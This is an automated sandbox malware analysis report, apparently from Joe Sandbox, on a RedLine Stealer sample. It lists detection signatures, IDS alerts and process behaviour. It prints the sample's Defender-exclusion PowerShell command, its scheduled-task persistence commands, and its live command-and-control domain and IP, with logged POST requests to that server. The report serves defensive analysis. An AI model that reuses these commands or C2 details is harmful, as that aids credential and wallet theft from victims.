Windows Analysis Report
13P2mxLaQk.exe

Overview

General Information

Sample name:13P2mxLaQk.exe
renamed because original name is a hash value
Original sample name:B47604CCFF9C611EAF0AA3D7443827B7.exe
Analysis ID:1527904
MD5:b47604ccff9c611eaf0aa3d7443827b7
SHA1:c09a5be24cd42bbd7605d0b40351d5134cf782a5
SHA256:77f30441445ceb75c76eff7bfb97f24849bc6155efb298f69a795933bf2f5e9a
Tags: exe, RedLineStealer, user-abuse_ch

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 13P2mxLaQk.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\13P2mxLaQk.exe" MD5: B47604CCFF9C611EAF0AA3D7443827B7)
    • powershell.exe (PID: 3456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6844 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3832 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 4468 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • VWGccZGgix.exe (PID: 5292 cmdline: C:\Users\user\AppData\Roaming\VWGccZGgix.exe MD5: B47604CCFF9C611EAF0AA3D7443827B7)
    • schtasks.exe (PID: 2036 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["billred229102.duckdns.org:34221"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
            • 0x133ca:$a4: get_ScannedWallets
            • 0x12228:$a5: get_ScanTelegram
            • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
            • 0x10e6a:$a7: <Processes>k__BackingField
            • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
            • 0x1079e:$a9: <ScanFTP>k__BackingField
            00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              SourceRuleDescriptionAuthorStrings
              0.2.13P2mxLaQk.exe.409bfd0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.13P2mxLaQk.exe.409bfd0.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.13P2mxLaQk.exe.409bfd0.2.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  0.2.13P2mxLaQk.exe.409bfd0.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x14802:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147e3:$v2_6: GetUpdates
                  7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\13P2mxLaQk.exe", ParentImage: C:\Users\user\Desktop\13P2mxLaQk.exe, ParentProcessId: 5880, ParentProcessName: 13P2mxLaQk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", ProcessId: 3456, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VWGccZGgix.exe, ParentImage: C:\Users\user\AppData\Roaming\VWGccZGgix.exe, ParentProcessId: 5292, ParentProcessName: VWGccZGgix.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp", ProcessId: 2036, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\13P2mxLaQk.exe", ParentImage: C:\Users\user\Desktop\13P2mxLaQk.exe, ParentProcessId: 5880, ParentProcessName: 13P2mxLaQk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", ProcessId: 3832, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\13P2mxLaQk.exe", ParentImage: C:\Users\user\Desktop\13P2mxLaQk.exe, ParentProcessId: 5880, ParentProcessName: 13P2mxLaQk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe", ProcessId: 3456, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\13P2mxLaQk.exe", ParentImage: C:\Users\user\Desktop\13P2mxLaQk.exe, ParentProcessId: 5880, ParentProcessName: 13P2mxLaQk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp", ProcessId: 3832, ProcessName: schtasks.exe
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-07T11:29:24.542021+0200 | 2045000 | 1 | Malware Command and Control Activity Detected | 45.88.88.45 | 34221 | 192.168.2.8 | 49707 | TCP
                    2024-10-07T11:29:27.354396+0200 | 2045000 | 1 | Malware Command and Control Activity Detected | 45.88.88.45 | 34221 | 192.168.2.8 | 49710 | TCP
                    2024-10-07T11:29:27.905794+0200 | 2046056 | 1 | A Network Trojan was detected | 45.88.88.45 | 34221 | 192.168.2.8 | 49707 | TCP
                    2024-10-07T11:29:31.060058+0200 | 2046056 | 1 | A Network Trojan was detected | 45.88.88.45 | 34221 | 192.168.2.8 | 49710 | TCP
                    2024-10-07T11:29:27.905794+0200 | 2045001 | 1 | Malware Command and Control Activity Detected | 45.88.88.45 | 34221 | 192.168.2.8 | 49707 | TCP
                    2024-10-07T11:29:31.060058+0200 | 2045001 | 1 | Malware Command and Control Activity Detected | 45.88.88.45 | 34221 | 192.168.2.8 | 49710 | TCP
                    2024-10-07T11:29:19.382523+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49707 | 45.88.88.45 | 34221 | TCP
                    2024-10-07T11:29:22.371423+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49710 | 45.88.88.45 | 34221 | TCP
                    2024-10-07T11:29:24.941101+0200 | 2849351 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49707 | 45.88.88.45 | 34221 | TCP
                    2024-10-07T11:29:27.589571+0200 | 2849351 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49710 | 45.88.88.45 | 34221 | TCP
                    2024-10-07T11:29:29.923744+0200 | 2848200 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49714 | 45.88.88.45 | 34221 | TCP
                    2024-10-07T11:29:32.939960+0200 | 2848200 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49721 | 45.88.88.45 | 34221 | TCP
                    2024-10-07T11:29:28.316654+0200 | 2849352 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49713 | 45.88.88.45 | 34221 | TCP
                    2024-10-07T11:29:31.119839+0200 | 2849352 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49716 | 45.88.88.45 | 34221 | TCP

                    AV Detection

                    Source: 13P2mxLaQk.exeAvira: detected
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["billred229102.duckdns.org:34221"], "Bot Id": "cheat"}
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeReversingLabs: Detection: 57%
                    Source: 13P2mxLaQk.exeReversingLabs: Detection: 57%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: 13P2mxLaQk.exeJoe Sandbox ML: detected
                    Source: 13P2mxLaQk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 13P2mxLaQk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Code function: 4x nop then jmp 07A1AF98h 0_2_07A1B6BB

                    Networking

                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.8:49707 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.8:49710 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.88.88.45:34221 -> 192.168.2.8:49707
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.88.88.45:34221 -> 192.168.2.8:49710
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.8:49707 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.8:49710 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.88.88.45:34221 -> 192.168.2.8:49707
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.88.88.45:34221 -> 192.168.2.8:49707
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.8:49714 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.8:49713 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.8:49716 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.8:49721 -> 45.88.88.45:34221
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.88.88.45:34221 -> 192.168.2.8:49710
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.88.88.45:34221 -> 192.168.2.8:49710
                    Source: Malware configuration extractorURLs: billred229102.duckdns.org:34221
                    Source: unknownDNS query: name: billred229102.duckdns.org
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 34221
                    Source: unknownNetwork traffic detected: HTTP traffic on port 34221 -> 49721
                    Source: global trafficTCP traffic: 192.168.2.8:49707 -> 45.88.88.45:34221
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: billred229102.duckdns.org:34221Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: billred229102.duckdns.org:34221Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: billred229102.duckdns.org:34221Content-Length: 962483Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: billred229102.duckdns.org:34221Content-Length: 962475Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: billred229102.duckdns.org:34221Content-Length: 962603Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: billred229102.duckdns.org:34221Content-Length: 962595Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: billred229102.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: billred229102.duckdns.org:34221Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://billred229102.duckdns.org
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://billred229102.duckdns.org:34221
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://billred229102.duckdns.org:34221/
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://billred229102.duckdns.org:34221t-
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.0000000003478000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460091932.000000000303C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, VWGccZGgix.exe, 00000009.00000002.1500999743.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.0000000003140000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
